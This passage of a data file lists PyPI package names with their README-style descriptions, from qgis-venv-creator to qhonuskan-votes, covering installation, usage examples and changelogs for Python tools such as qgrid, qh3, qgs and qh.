\"C:\\qgis\\3.28\\apps\\qgis-ltr\\\"--python-executableWindowsPath to the Python executable used by the QGIS installation. If not given, the Python executable is searched from the QGIS installation.--debugALLEnable debug loggingDevelopmentThis project usesHatchfor development and packaging. Install instructions can be found at the project's websitehttps://hatch.pypa.io/latest/install.To facilitate development with VS Code, it is recommended to create hatch environments in the project folder. You can configure hatch to do so by running:hatch config set dirs.env.virtual \".hatch\"After Hatch has created the environment, you can set your Python interpreter to use the one located in.hatch/qgis-venv-creator.Pre-commit hookThis project usespre-committo run code checks and tests before committing. You can install pre-commit with:pipx install pre-commitInstall pre-commit hooks to your repo with:pre-commit installLicenseqgis-venv-creatoris distributed under the terms of theMITlicense."} +{"package": "qgitc", "pacakge-description": "QGitcA file conflict viewer for gitFeaturesTwo branches view for easy comparing a conflict commit base on the file.Visualize white spaces and carriage return for easy diff compare.Syntax highlight for diff contents.Filter logs by file path or commit pattern.Copy commit summary as HTML format for pasting.Custom pattern for creating links.Collect conflict files for merging.Launch specify merge tool for specify file suffix.Builtin image diff tool for easy finding the difference.Auto finding which commit cause conflicts.File blame supportRequirementsPySide6git (command line)chardetpywin32Optional for Windows if you want record the conflict log easilypywpsrpcOptional for Linux if you want record the conflict log easilyopenpyxlOptional if no pywin32/ pywpsrpc is availableBuild & RunUsing source directlyRunqgitc.pyunder project root directory.NOTE: If you want translation other than English or updated the UI files, runpython setup.py buildfor the first time.Build from sourceRunpip install .under project root directory to install qgitc, and then runqgitccommand.Install from pypipip install qgitcShell Integrationqgitcshellregister# to unregister, run:qgitcshellunregister# to use the source directly:pythonqgitc.pyshellregister# for Linux user# if your file manager isn't the default one comes with desktop# say your desktop is Ubuntu, but use thunar as default one# use --file-manager to specify reigster forqgitchshellregister--file-manager=thunar"} +{"package": "qgmap", "pacakge-description": "Qt Google Map widget for PySide/PyQt4Features:Specify locations either by latitude, longitude pairs or street\naddresses by means of GeoCodingProgramatically centering, zooming and manipulate markersFlexible marker properties (ie. draggable, icon, title\u2026)Emits signals on user actions: dragged markers, pans or zoomsEasy to extend, thanks to the painless python-qt-javascript interfaceInstallationBy using pip:$ pip3 install qgmapFrom source:python3 setup.py --installUsageTwo main classes are provided:qgmap.GeoCoder: Retrieves geo-coordinates (latitude, longitude) from\nstreet addressesqgmap.QGoogleMap: A WebView widget containing a GoogleMap, with some\nconvenience accessors to manage center, zoom, markers\u2026See the main example code at qgmap-example.pyUsing it with PyQt4By default the classes use PySide, but the code works for PyQt4 if you\nset to False the usePySide module variable by hand.Any suggestion to make this less hacky is welcome.AcknoledgementsThis Python code has been inspired in Henrik Hartz\u2019s C++ example code:https://blog.qt.digia.com/blog/2008/07/03/putting-qtwebkit-to-use-with-google-maps/"} +{"package": "qgofer", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "q-gomoku", "pacakge-description": "No description available on PyPI."} +{"package": "qgprofiler", "pacakge-description": "qgprofiler==============QGProfiler is a simple, user controlled profiler. It differs fromother profilers in that it provides the programmer the control ofgranularity with which various parts of the program are profiled.By doing this, the programmer can keep profiling overhead low(QGProfiler is meant to be used in production), while still gettingvisibility in the most important components of the program.Installation--------------using pip:```sh$ pip install qgprofiler```using setuptools:```sh$ git clone https://github.com/quantumgraph/qgprofiler$ cd qgprofiler$ python setup.py install```Usage--------------This module consists two main classes **QGProfiler** and **QGProfileAggregator**. Their usage is described and demonstrated below.### QGProfiler:QGProfiler takes 2 definite arguments and 1 optional argument:- name for the program (this will be the root name of the stack)- output filename with path (the filename should end with .json or .xml; if path is not specified than it generates in the current folder with the given file name)- an optional custom attributes which can be attached to the node and can be updated ```attributes={'somename': 'max', 'anothername': 'sum'}``` (value can be either 'max' or 'sum'; QGProfiler will do the computation to float up the values to the parent node by the type it has been defined; the idea is to use this feature for calculating memory with max and no.of db calls made with sum feature and so on..)This class contains few functions which can be used to evaluate the time taken by each function/module and the number of times the same function/module has been called. The time taken is determined by using simple- ```push('name')``` (name can be function name/db query/class module/etc.),- ```pop()``` when the execution of the function is done or- ```pop_all()``` which helps user to pop all the nodes in stack if the user lost count of how many pushes done. After the end of the program user has to call- ```end()``` to end the root program time and then- ```generate_file()``` is used for generating either xml or json file. By default QGProfiler will not round the number of values while generate_file to get maximum precision, you can round those values by passing an argument like ```generate_file(rounding_no=6)``` or just ```generate_file(6)```.A Brief Example is illustrated below with the output to get started:```pythonimport timefrom qgprofiler import QGProfiler# filename extension can be either json or xmlqg_profiler = QGProfiler('program_root_name', '/path/to/your/file/filename.json', {'mem': 'max'}) # program startedqg_profiler.push('test1') # test1 startedtime.sleep(0.1) # sleep follows that some program is executedqg_profiler.update('mem', 10)# update will update the attribute of the nodeqg_profiler.push('test11') # test11 startedtime.sleep(0.5)qg_profiler.pop() # test11 endedqg_profiler.push('test12') # test12 startedtime.sleep(0.5)qg_profiler.update('mem', 10)qg_profiler.push('test121') # test121 startedtime.sleep(1.0)qg_profiler.update('mem', 30)qg_profiler.pop() # test121 endedqg_profiler.pop() # test12 endedqg_profiler.push('test12') # test12 startedtime.sleep(0.5)qg_profiler.pop() # test121 endedqg_profiler.pop() # test1 endedqg_profiler.push('test2') # test2 startedtime.sleep(0.1)qg_profiler.update('mem', 10)qg_profiler.pop() # test2 endedqg_profiler.push('test2') # test2 startedtime.sleep(0.1)qg_profiler.update('mem', 20)qg_profiler.pop() # test2 endedqg_profiler.end() # program endedqg_profiler.generate_file() # will generate the file```This generates a file which contains a json```json{\"count\": 1,\"name\": \"program_root_name\",\"value\": 2.808331,\"overhead\": 3.5e-05,\"attributes\": {\"mem\": {\"type\": \"max\", \"value\": 30}},\"children\": [{\"count\": 1,\"name\": \"test1\",\"value\": 2.606762,\"overhead\": 0.00013199999999999998,\"attributes\": {\"mem\": {\"type\": \"max\", \"value\": 30}},\"children\": [{\"count\": 1,\"name\": \"test11\",\"value\": 0.501054,\"overhead\": 0.00031099999999999997,\"attributes\": {\"mem\": {\"type\": \"max\", \"value\": 0}},\"children\": []}, {\"count\": 2,\"name\": \"test12\",\"value\": 2.0043670000000002,\"overhead\": 0.000463,\"attributes\": {\"mem\": {\"type\": \"max\", \"value\": 30}},\"children\": [{\"count\": 1,\"name\": \"test121\",\"value\": 1.001872,\"overhead\": 0.000338,\"attributes\": {\"mem\": {\"type\": \"max\", \"value\": 30}},\"children\": []}]}]}, {\"count\": 2,\"name\": \"test2\",\"value\": 0.20094299999999998,\"overhead\": 0.000297,\"attributes\": {\"mem\": {\"type\": \"max\", \"value\": 20}},\"children\": []}]}```File generated if .xml is given as extension in the filename```xml```### QGProfileAggregator:QGProfileAggregator takes 2 arguments:- input filepath (takes unix level command, ex: ~/path/*.xml; takes all xml files specified in the given path)- output filename with path (the filename should end with .json or .xml or .html; if path is not specified than it generates in the current folder with the given file name)This class contains one function ```generate_file()``` which will aggregate all the files data (.xml or .json whichever is specified or it takes all the files if specified * and process only .xml / .json). This will generate .xml / .json file whichever is specified in output filename. By default QGAggregator will set an argument for rounding the number of value to 6 digits to generate_file, you can overwite it by passing it as argument like ```generate_file(rounding_no=4)``` or just ```generate_file(4)```. If the generated file output is .json or .xml, the format will be as shown as above. But if .html is given as the extension, it will generate a flame graph using d3 which requires active internet connection to download the required js files, and the graph will look like![Alt text](/qgprofiler/images/flamegraph-1.png?raw=true \"Flame Graph\")A Brief Example is illustrated below to use it:```pythonfrom qgprofiler import QGProfileAggregatorqg_profile_agg = QGProfileAggregator('/your/file/path/*.xml', '/path/to/your/file/filename.xml')qg_profile_agg.generate_file() # this agrregates all the json/xml files into 1 file```"} +{"package": "qgpt", "pacakge-description": "No description available on PyPI."} +{"package": "qgpu", "pacakge-description": "No description available on PyPI."} +{"package": "qgrabber", "pacakge-description": "No description available on PyPI."} +{"package": "qgrad", "pacakge-description": "No description available on PyPI."} +{"package": "qgrid", "pacakge-description": "An Interactive Grid for Sorting and Filtering DataFrames in Jupyter Notebook"} +{"package": "qgridnext", "pacakge-description": "Documentation|Demos|Presentation|ChangelogQgrid is a Jupyter widget that utilizesSlickGridto render pandas DataFrames within JupyterLab/Notebook. This allows you to explore your DataFrames with intuitive scrolling, sorting, and filtering controls, as well as edit your DataFrames by double clicking cells. Initially developed by Quantopian,its repoceased maintenance in 2020. QgridNext aims to continue maintaining and improving it for future Jupyter versions.CompatibilityQgridNext is compatible with recent versions of Jupyter:QgridNextJupyterLabNotebookVoilav2.0.0v3 - v4v5 - v7v0.2 - v0.5The test environments are provided in thetest_envsfolder. You can try the widget in these environments easily.QgridNext V2.0.0The first release v2.0.0 significantly improves compatibility and addresses bugs found in Qgrid v1.3.1.Support JupyterLab 4;Released as a prebuilt extension (now can be installed with one step);UI improvements:Fix infinitely expanding width of the container in voila <= 0.3;Prevent unexpected scrolling when clicking rows in Chrome for JupyterLab;Adapt canvas size when the sidebar width changes in JupyterLab;Fix poorly displayed left/right button of date picker;Correct text color in dark mode;Standardize HTML tags to fix poorly displayed filters;Building bug fixes:Fix inconsistent pkg name for embeddable qgrid bundle;Fix data_files finding that results in incomplete extension setup;Fix building errors for Node >= 18;Other fixes:EnsureDefaults.grid_optiondict instance are not shared across widget instances;Remove full-screen mode for voila compatibility;Remove deprecated QGridWidget alias, only QgridWidget is allowed;Replace deprecated usages for traitlets, pandas and jquery.InstallationInstalling with pip:pipinstallqgridnextRequirementsQgridNext supports Python 3.7+ and depends on the following packages:pandas>= 0.20ipywidgets>= 7numpytraitletsUsageExploring DataframesRendering your DataFrame:fromqgridimportshow_gridshow_grid(your_df)Qgrid excels in handling large DataFrames. For example, it can render a DataFrame with 10,000,000 rows in about 0.8 seconds:Column-specific options:Qgrid has the ability to set a number of options on a per column basis. This allows you to do things like explicitly specify which column should be sortable, editable, etc. For example, if you wanted to prevent editing on all columns except for a column named 'A', you could do the following:col_opts={'editable':False}col_defs={'A':{'editable':True}}show_grid(df,column_options=col_opts,column_definitions=col_defs)Row-specific options:Currently, Qgrid supports disabling row editing on a per-row basis, enabling row editability based on specific criteria:defcan_edit_row(row):returnrow['status']=='active'show_grid(df,row_edit_callback=can_edit_row)Updating an existing Qgrid widget: You can update an existing Qgrid widget's state using APIs likeedit_cell,change_selection,toggle_editable, andchange_grid_option.Event handlersUseonandoffmethods to attach/detach event handlers. They're available on both theqgridmodule (seeqgrid.on) and individualQgridWidgetinstances (seeqgrid.QgridWidget.on).Example:defhandle_json_updated(event,qgrid_widget):# Exclude 'viewport_changed' events since that doesn't change the DataFrameif(event['triggered_by']!='viewport_changed'):print(qgrid_widget.get_changed_df())# qgrid_widget = show_grid(...)qgrid_widget.on('json_updated',handle_json_updated)Alternatively, the traditionalobservemethod is available but not recommended due to its less granular event control:defhandle_df_change(change):print(change['new'])qgrid_widget.observe(handle_df_change,names=['_df'])Event handlers enable interesting integrations with other widgets/visualizations, like using qgrid to filter a DataFrame also displayed by another visualization.For more examples, see theevents notebook.TroubleshootIf you are not seeing the widget, check if the extension is installed and enabled:jupyterlabextensionlist\njupyterlabextensionenableqgridnext# enable it if disabledTestingMultiple test environments are provided intest_envs. You can perform automated tests by pytest, or manually test it in your browser.DevelopmentNote: JupyterLab 4 and NodeJS are required to build the extension package. You can usedev.ymlintest_envsfor a quick setup.gitclonehttps://github.com/zhihanyue/qgridnextcdqgridnext\npipinstall-ve.# Install package in development modepip install -ve .installs the package into your python environment as a symlink. It also creates symlinks of built JS extensions for your Jupyter environments automatically (implemented by our custom command insetup.py). After making any changes to the JS code, just rebuild it by:npm--prefix./jsinstallWhen uninstalling it, you need to clean up the JS symlinks via scriptunlink_dev.py:pipuninstallqgridnext\npython./unlink_dev.pyContributingAll contributions, bug reports, bug fixes, documentation improvements, enhancements, demo improvements and ideas are welcome."} +{"package": "qgridtrusted", "pacakge-description": "qgridtrustedA fork ofqgridusingtrusted publishing.To reduce the changes required to adopt this fork, the project is installed asqgridtrustedand the Python package is imported asqgrid. For details of how\nto use theqgridpackage seeREADME.rst.Pull requests including automated tests are welcome.PrioritiesThis fork should:Be easy to installBe compatible with recent releases of its dependenciesMinimise changes to the Python code (see below)Changes to the Python codeCommand to view the changes to the Python code:git diff 877b420d3bd83297bbcc97202b914001a85afff2.. '*.py'Command to view a summary of the number of lines changed usingcloc:cloc --vcs=git --include-lang=Python --diff 877b420d3bd83297bbcc97202b914001a85afff2 HEAD"} +{"package": "qgs", "pacakge-description": "Quasi-Geostrophic Spectral model (qgs)General Informationqgs is a Python implementation of an atmospheric model for midlatitudes. It models the dynamics of\na 2-layerquasi-geostrophicchannel\natmosphere on abeta-plane, coupled to a simple land orshallow-waterocean component.About(c) 2020-2023 qgs Developers and ContributorsPart of the code originates from the PythonMAOOAMimplementation by Maxime Tondeur and Jonathan Demaeyer.SeeLICENSE.txtfor license information.Please cite the code description article if you use (a part of) this software for a publication:Demaeyer J., De Cruz, L. and Vannitsem, S. , (2020). qgs: A flexible Python framework of reduced-order multiscale climate models.Journal of Open Source Software,5(56), 2597,https://doi.org/10.21105/joss.02597.Please consult the qgscode repositoryfor updates.InstallationWith pipThe easiest way to install and run qgs is to usepippip install qgsand you are set!Additionally, you can clone the repositorygit clone https://github.com/Climdyn/qgs.gitand perform a test by running the scriptpython qgs/qgs_rp.pyto see if everything runs smoothly (this should take less than a minute).With AnacondaThe easiest way to install and run qgs is to use an appropriate environment created throughAnaconda.First install Anaconda and clone the repository:git clone https://github.com/Climdyn/qgs.gitThen install and activate the Python3 Anaconda environment:conda env create -f environment.yml\nconda activate qgsYou can then perform a test by running the scriptpython qgs_rp.pyto see if everything runs smoothly (this should take less than a minute).Note for Windows and MacOS usersPresently, qgs is compatible with Windows and MacOS but users wanting to use qgs inside their Python scripts must guard the main script with aif __name__ == \"__main__\":clause and add the following lines belowfrom multiprocessing import freeze_support\n freeze_support()About this usage, see for example the main scriptsqgs_rp.pyandqgs_maooam.pyin the root folder.\nNote that the Jupyter notebooks are not concerned by this recommendation and work perfectly well on both operating systems.Why?These lines are required to make the multiprocessing library works with these operating systems. Seeherefor more details,\nand in particularthis section.Activating DifferentialEquations.jl optional supportIn addition to the qgs builtin Runge-Kutta integrator, the qgs model can alternatively be integrated with a package calledDifferentialEquations.jlwritten inJulia, and available through thediffeqpypython package.\nThe diffeqpy package first installation step is done by Anaconda in the qgs environment but then you mustinstall Juliaand follow the final manual installation instruction found in thediffeqpy README.These can be summed up as opening a terminal and doing:conda activate qgs\npythonand then inside the Python command line interface do:>>> import diffeqpy\n>>> diffeqpy.install()which will then finalize the installation. An example of a notebook using this package is available in the documentation and onreadthedocs.DocumentationTo build the documentation, please run (with the conda environment activated):cd documentation\nmake htmlYou may need to installmakeif it is not already present on your system.\nOnce built, the documentation is availablehere.The documentation is also available online on read the docs:https://qgs.readthedocs.io/Usageqgs can be used by editing and running the scriptqgs_rp.pyandqgs_maooam.pyfound in the main folder.For more advanced usages, please read theUser Guides.ExamplesAnother nice way to run the model is through the use of Jupyter notebooks.\nSimple examples can be found in thenotebooks folder.\nFor instance, runningconda activate qgs\ncd notebooks\njupyter-notebookwill lead you to your favorite browser where you can load and run the examples.Dependenciesqgs needs mainly:Numpyfor numeric supportsparsefor sparse multidimensional arrays supportNumbafor code accelerationSympyfor symbolic manipulation of inner productsCheck the yaml fileenvironment.ymlfor the dependencies.Forthcoming developmentsScientific development (short-to-mid-term developments)Non-autonomous equation (seasonality, etc...)Energy diagnosticsTechnical mid-term developmentsDimensionally robust Parameter class operationVectorization of the tensor computationLong-term development trackActive advectionTrue quasi-geostrophic ocean when using ocean model versionSalinity in the oceanSymbolic PDE equation specificationNumerical basis of functionContributing to qgsIf you want to contribute actively to the roadmap detailed above, please contact the main authors.In addition, if you have made changes that you think will be useful to others, please feel free to suggest these as a pull request on theqgs Github repository.More information and guidance about how to do a pull request for qgs can be found in the documentationhere.Other atmospheric models in PythonNon-exhaustive list:Q-GCM: A mid-latitude grid based ocean-atmosphere model like MAOOAM. Code in Fortran,\ninterface is in Python.pyqg: A pseudo-spectral python solver for quasi-geostrophic systems.Isca: Research GCM written in Fortran and largely\nconfigured with Python scripts, with internal coding changes required for non-standard cases."} +{"package": "qgsctx", "pacakge-description": "Initialize data providers and map layers for QGIS plugins which are launched as standalone applications"} +{"package": "qgsgl", "pacakge-description": "Conversion tool for QGIS map project into webmapgl styleUsageSourcesGeoJSONfromqgsglimportGeoJSONSourceurl='https://example.com/data/stations.geojson'source=GeoJSONSource('stations',url)source.add_layer(station_layer)source.write('/www/data/stations.geojson')style.add_source(source)VectorfromqgsglimportVectorSourceurl='https://example.com/tiles/project.json'source=VectorSource('project',url)source.add_layer(station_layer,min_zoom=12,max_zoom=14)source.add_layer(street_layer,min_zoom=10,max_zoom=14)source.write('/www/tiles/project.mbtiles')style.add_source(source)Running Testspython -m unittest discoverChangelog[0.1.2] - 2019-06-20Fixes fill layer label placed incorrectly (#50)Multiple symbol layers now display in correct order (#52)Fill layer no brush property now controls fill color (#53)Circle layer will not generate two GL layers (#54)[0.1.1] - 2019-05-20Fixes bugs with color not using alpha channel (#45)Created checks for unsupported symbol layer and simplified layer class\nselection logic (#46)Removed incorrect visibility logic from layer converter (#51)[0.1.0] - 2019-05-02Initial release"} +{"package": "qg-spider-sdk", "pacakge-description": "\u722c\u866b\u7cfb\u7edf\u516c\u5171\u7c7b\u5c01\u88c5\u76ee\u6807redis db \u5212\u5206url \u8bb0\u5f55\u6c60\u5c01\u88c5\u4e0b\u8f7d\u9875\u9762\u6c60\u5c01\u88c5\u89e3\u6790\u7ed3\u679c\u6c60\u5c01\u88c5\u7f51\u7ad9\u4fe1\u606f\u7c7b\u5c01\u88c5redis db \u5212\u5206(0-15)- 0 -> \u5e38\u7528\u7684\u961f\u5217\u4e0e\u6709\u5e8f\u96c6\u6216\u96c6\u5408\n\u5176\u4e2d\u7684hash\u8868\u5b9a\u4e49\n - website -> \u7f51\u7ad9\u4fe1\u606f\n - url_record -> url \u8bb0\u5f55\u6c60\n - url_page -> \u4e0b\u8f7d\u9875\u9762\u6c60\u5c01\u88c5\n - parse_result -> \u89e3\u6790\u7ed3\u679c\u6c60\u5c01\u88c5\n- 10-15 -> \u76d1\u63a7\u81ea\u884c\u5904\u7406"} +{"package": "qg-struct", "pacakge-description": "\u5e95\u5c42\u5c01\u88c5(redis)pip install pytestpip install -r requirements.txt\u5b89\u88c5\u4f9d\u8d56pytest\u8fd0\u884c\u6d4b\u8bd5\u7528\u4f8b"} +{"package": "qg.test", "pacakge-description": "qg.test========"} +{"package": "qg-tool", "pacakge-description": "# \u5de5\u5177\u7c7b"} +{"package": "qg_utils", "pacakge-description": "# qg_utils### Testing\nTo run tests:`sh $ python-munittest discover `### Installation\nusing pip:`sh $ pip install qg_utils `using setuptools:`sh $ git clonehttps://github.com/quantumgraph/qg_utils$ cd qg_utils $ pip install qg_utils `"} +{"package": "qg.web", "pacakge-description": "qg.web======="} +{"package": "qgweb3", "pacakge-description": "# QG \u4e00\u4e9b\u4e2a\u4eba\u4f7f\u7528\u7684\u5305## \u53d1\u5e03\u6d41\u7a0b\npython setup.py bdist_wheel \u2013universal\ntwine upload dist/* \u2013verbose"} +{"package": "qgym", "pacakge-description": "QGYM \u2013 A Gym for Training and Benchmarking RL-Based Quantum Compilationqgymis a software framework that provides environments for training and benchmarking RL-based quantum compilers.\nIt is built on top of OpenAI Gym and abstracts parts of the compilation process that are irrelevant to AI researchers.qgymincludes three environments:InitialMapping,Routing, andScheduling, each of which is customizable and extensible.DocumentationWe have created anextensive documentationwith code snippets.\nPlease feel free to contact us vias.feld@tudelft.nlif you have any questions, or by creating aGitHub issue.Getting StartedWhat follows are some simple steps to get you running.\nYou could also have a look at someJupyter Notebooksthat we have created for a tutorial at theIEEE International Conference on Quantum Computing and Engineering (QCE\u201922).Installing with pipTo install theqgymusepip install qgymIf you would also like to use the notebooks, additional packages are required, which can simply be installed by using\nIn this case, usepip install qgym[tutorial]Currentlyqgymhas support for Python 3.7, 3.8, 3.9, 3.10 and 3.11.PublicationThe paper onqgymhas been presented in the1st International Workshop on Quantum Machine Learning: From Foundations to Applications (QML@QCE'23).\nThe publication can be found oncomputer.orgYou can find the preprint of the paper onarxiv.@inproceedings{van2023qgym,\n title={qgym: A Gym for training and benchmarking RL-based quantum compilation},\n author={Van Der Linde, Stan and De Kok, Willem and Bontekoe, Tariq and Feld, Sebastian},\n booktitle={2023 IEEE International Conference on Quantum Computing and Engineering (QCE)},\n volume={2},\n pages={26--30},\n year={2023},\n organization={IEEE}\n}TeamBuilding qgym is a joint effort.Core developersStan van der LindeWillem de KokTariq BontekoeSebastian FeldContributors and Power UsersJoris HenstraRares Oancea"} +{"package": "qh", "pacakge-description": "qhQuick Http web-service construction.Getting from python to an http-service exposing them to the world,\nin the easiest way machinely possible.Harnesses the great power ofpy2httpwithout all the responsibilities.This is meant for the desireable lightening fast development cycles during\nproof-of-conceptualization.\nAs you move towards production, consider using one of those boring grown-up tools out there...To install:pip install qhExamplesWhen dealing only with simple (json) types...importqhfromqhimportmk_http_service_appdefpoke():return'here is a peek'deffoo(x:int):returnx+2defbar(name='world'):returnf\"Hello{name}!\"app=mk_http_service_app([foo,bar,poke])app.run()Bottle v0.12.19 server starting up (using WSGIRefServer())...\nListening on http://127.0.0.1:8080/\nHit Ctrl-C to quit.Now grab a browser and go tohttp://127.0.0.1:8080/ping(it's a GET route that the app gives you for free, to test if alive){\"ping\": \"pong\"}Now try some post requests:Run this script somewhere. For example, with curl try things like:curl http://127.0.0.1:8080/ping\n# should get {\"ping\": \"pong\"}\n\ncurl -X POST http://127.0.0.1:8080/poke\n# should get \"here is a peek\"\n\ncurl -H \"Content-Type: application/json\" -X POST -d '{\"x\": 3}' http://127.0.0.1:8080/foo\n# (should get 5)\n\ncurl -H \"Content-Type: application/json\" -X POST -d '{\"name\": \"qh\"}' http://127.0.0.1:8080/bar\n# should get \"hello qh!\"Now be happy (or go try the other function by doing some post requests).When your types get complicatedTo deploy the above, we would just need to doapp=mk_http_service_app([poke,foo,bar])But what if we also wanted to handle this:defadd_numpy_arrays(a,b):return(a+b).tolist()Here the a and b are assumed to be numpy arrays (or.tolist()would fail).\nOut of the box, qh can only handle json types(str, list, int, float), so we need to preprocess the input.qhmakes that easy too.Here we provide a name->conversion_func mapping (but could express it otherwise)fromqh.transimportmk_json_handler_from_name_mappingimportnumpyasnpinput_trans=mk_json_handler_from_name_mapping({\"a\":np.array,\"b\":np.array})app=mk_http_service_app([poke,foo,bar,add_numpy_arrays],input_trans=input_trans)app.run()Now try it out:curl -H \"Content-Type: application/json\" -X POST -d '{\"a\": [1,2,3], \"b\": [4,5,6]}' http://127.0.0.1:8080/add_numpy_arrays\n# should get [5, 7, 9]"} +{"package": "qh3", "pacakge-description": "What isqh3?qh3is a maintained fork of theaioquiclibrary.\nIt is lighter, faster, and more adapted to mass usage. Regularly improved and expect a better time to initial response in issues and PRs.qh3is a library for the QUIC network protocol in Python. It features\na minimal TLS 1.3 implementation, a QUIC stack, and an HTTP/3 stack.QUIC was standardized inRFC 9000and HTTP/3 inRFC 9114.qh3is regularly tested for interoperability against otherQUIC implementations.To learn more aboutqh3pleaseread the documentation.Why should I useqh3?qh3has been designed to be embedded into Python client and server\nlibraries wishing to support QUIC and/or HTTP/3. The goal is to provide a\ncommon codebase for Python libraries in the hope of avoiding duplicated effort.Both the QUIC and the HTTP/3 APIs follow the \u201cbring your own I/O\u201d pattern,\nleaving actual I/O operations to the API user. This approach has a number of\nadvantages including making the code testable and allowing integration with\ndifferent concurrency models.This library is the lowest level you can find for handling QUIC and HTTP/3. Here are higher libraries:mid-way:urllib3.futurehighest and easiest:niquests(Recommended!)FeaturesQUIC stack conforming withRFC 9000HTTP/3 stack conforming withRFC 9114minimal TLS 1.3 implementation conforming withRFC 8446IPv4 and IPv6 supportconnection migration and NAT rebindinglogging TLS traffic secretslogging QUIC events in QLOG formatHTTP/3 server push supportRequirementsqh3requires Python 3.7 or greater.Running the examplesqh3comes with a number of examples illustrating various QUIC use cases.You can browse these examples here:https://github.com/Ousret/qh3/tree/main/examplesLicenseqh3is released under theBSD license."} +{"package": "qha", "pacakge-description": "No description available on PyPI."} +{"package": "qhal", "pacakge-description": "Quantum Hardware Abstraction Layer package."} +{"package": "qham", "pacakge-description": "Qham - A QUICK INSIGHT INTO QUANTUM HAMILTONIAN SIMULATIONSQham is a Python SDK designed to bridge the gap between theoretical physics and practical quantum computing applications. It provides a comprehensive suite of tools for exploring, simulating, and analyzing Hamiltonian processes across statistical mechanics and quantum mechanics.At the heart of Qham lies a mission to democratize the understanding of Hamiltonian dynamics, unravel the complexities of physical systems, and streamline the development of quantum algorithms. By amalgamating theoretical concepts with practical computational tools, Qham endeavors to make the intricate study of Hamiltonian systems both accessible and intuitive.OverviewQham is a Python library that consists of the following components:ComponentDescriptionqhamA lightweight Quantum Hamiltonian Simulations for high-performance Quantum researchqham.fhmFermiHubbard Modalqham.hbmHeisenberg Modalqham.qhoQuantum Harmonic Oscillatorqham.TFIMTransverse Field Ising ModelQham, can be used for,a Hamiltonian processing in quantum mechanics and statistical mechanics.a quantum python package whichl will give a good introduction quantum hamilotnian simulations.InstallationSee the Qham[Installation][]guide for detailed installation instructions (including building from source).Currently,qhamsupports releases of Python 3.6 onwards;\nTo install the current release:$pipinstall--upgradeqhamGetting StartedMinimal Exampleimportqham# Initialize the TFIM simulationsim=TFIMSimulation(size=10,beta=0.4,h=0.05,steps=100)# Run the simulationsim.run_simulation()# Plot the final lattice configurationsim.plot_lattice()ResourcesPyPiDocumentationIssue trackingContributingWe appreciate all contributions, feedback and issues. If you plan to contribute new features, utility functions, or extensions to the core, please go through our [Contribution Guidelines][].To contribute, start working through theqhamcodebase, read the [Documentation][], navigate to the [Issues][] tab and start looking through interesting issues.Asking for helpIf you have any questions, please:Read the docs.Look it up in our Github Discussions (or add a new question).Search through the issues.Licenseqham is open-source and released under theMIT License."} +{"package": "qhanutils", "pacakge-description": "qhan-utilsQhan's personal utilities."} +{"package": "qhbayes", "pacakge-description": "QHBayesBayesian methods for inferring mass eruption rate from column height (or vice versa) for volcanic eruptionsWhat is it?QHBayesuses Bayesian methods to explore the relationship between the mass eruption rate (Q) of a volcanic eruption and the height reached by the volcanic eruption column (H) that is produced.The mass eruption rate is a quantity that is very important in volcanology and in the dispersion of volcanic ash in the atmosphere, but it is very difficult to measure directly.Often the mass eruption rate is inferred from observations of the height of the volcanic eruption column, since the eruption column is often much easier to measure. The eruption column height is linked to the mass eruption rate through the fluid dynamics of turbulent buoyant plumes, but there are often external volcanological and atmospheric effects that contribute and complicate the relationship.Datasets of the mass eruption rate and eruption column height have been compiled and used to determine an empirical relationship these quantities, using linear regression. This has then been used to infer the mass eruption rate from the plume height.QHBayesgoes further, by using Bayesian methods to perform the regression. Bayesian methods:allow us to incorporate a range ofuncertaintiesquantitatively into our model;provide a meaningful quantitative comparison of different models;Main FeaturesHow do I get set up?Summary of set upConfigurationDependenciesDatabase configurationHow to run testsDeployment instructionsContribution guidelinesWriting testsCode reviewOther guidelinesWho do I talk to?Repo owner or adminOther community or team contact"} +{"package": "qhbmlib", "pacakge-description": "QHBM LibraryThis repository is a collection of tools for building and training\nQuantum Hamiltonian-Based Models. These tools depend onTensorFlow Quantum,\nand are thus compatible with both real and simulated quantum computers.Installation instructionsandcontribution instructionscan be found in the docs folder.This is not an officially supported Google product."} +{"package": "qhdl", "pacakge-description": "QHDLCircuit Components as and QHDL in PythonDevelopment of QHDL happens onGithub.\nYou can read the full documentation atReadTheDocs.InstallationTo install the latest released version of QHDL, run this command in your terminal:$pipinstallqhdlThis is the preferred method to install QHDL, as it will always install the most recent stable release.If you don\u2019t havepipinstalled, thePython installation guidecan guide\nyou through the process.To install the latest development version of QHDL fromGithub.$pipinstallgit+https://github.com/mabuchilab/qhdl.git@develop#egg=qhdlUsageTo use QHDL in a project:import qhdlHistory0.1.0 (2018-12-06)Initial release"} +{"package": "qhist", "pacakge-description": "QHist\u2013 A Quick Histogram drawer forROOT::TTreefor smoother HEP analysis!Examples:Simple draw from tree and parameter (branch name):h1 = QHist()\nh1.trees = t1\nh1.params = 'M'\nh1.draw()Overlaid comparison between branches, compact syntax:QHist(trees=t1, params=['mu_PT/1e3','pi_PT/1e3'], xlabel='PT [GeV]', xmax=60).draw()Compare between trees, with filtering, and reusable via templating:H = QHist(trees=[t1, t2, t3], filters=['mu_PT>20e3'])\nH(params='APT' , xmin=0 , xlabel='PT-asymmetry').draw()\nH(params='M/1e3', xmax=120, xlabel='Mass [GeV]').draw()Read more onhttps://qhist.readthedocs.ioInstallation & dependenciesIt\u2019s available frompip install qhist.\nThe package requires an existing installation ofPyROOT.DisclaimerThis packacge was written and used during my PhD in 2013-2017 at EPFL (Lausanne) and LHCb collaboration (CERN),\nfor the work inZ->tau taucross-section measurement andH->mu tausearches at LHCb (8TeV).\nI hope it can be of a good use for future analysis\u2026"} +{"package": "qhonuskan-votes", "pacakge-description": "Easy to use reddit like voting system for django models.FeaturesDoes not use GenericForeignKeys (which irritates me when making queries)\nHas vote_buttons_for templatetag, that generates html code for your object\nfor vote buttons.Has, default_buttons.css which gives a shape your buttons as default, but\nyou can override.Has, voting_script template tag, it generates javascript code to make\najax requests for voting. Automatically finds qhonuskan_votes views.voting_script tag also renders overridable show_not_authenticated_error\nfunction, so you can use your own error windows (jquery-ui etc.) via\noverriding it.Default buttons are pure css, there is no images. So it\u2019s lite.What\u2019s new?version 0.2Definedget_versionmethod to get project version in your code.Lettuce tests are added for testing voting system.Changedvoteview name asqhonuskan_vote. Prefix is required for\nminimizing view name conflicts.Moved templates totemplates/qhonuskandirectory.Minimum Django version that we supported is 1.3.Quick Implementation GuideAdd qhonuskan_votes to your INSTALLED_APPS.INSTALLED_APPS = ('...',\n '...',\n 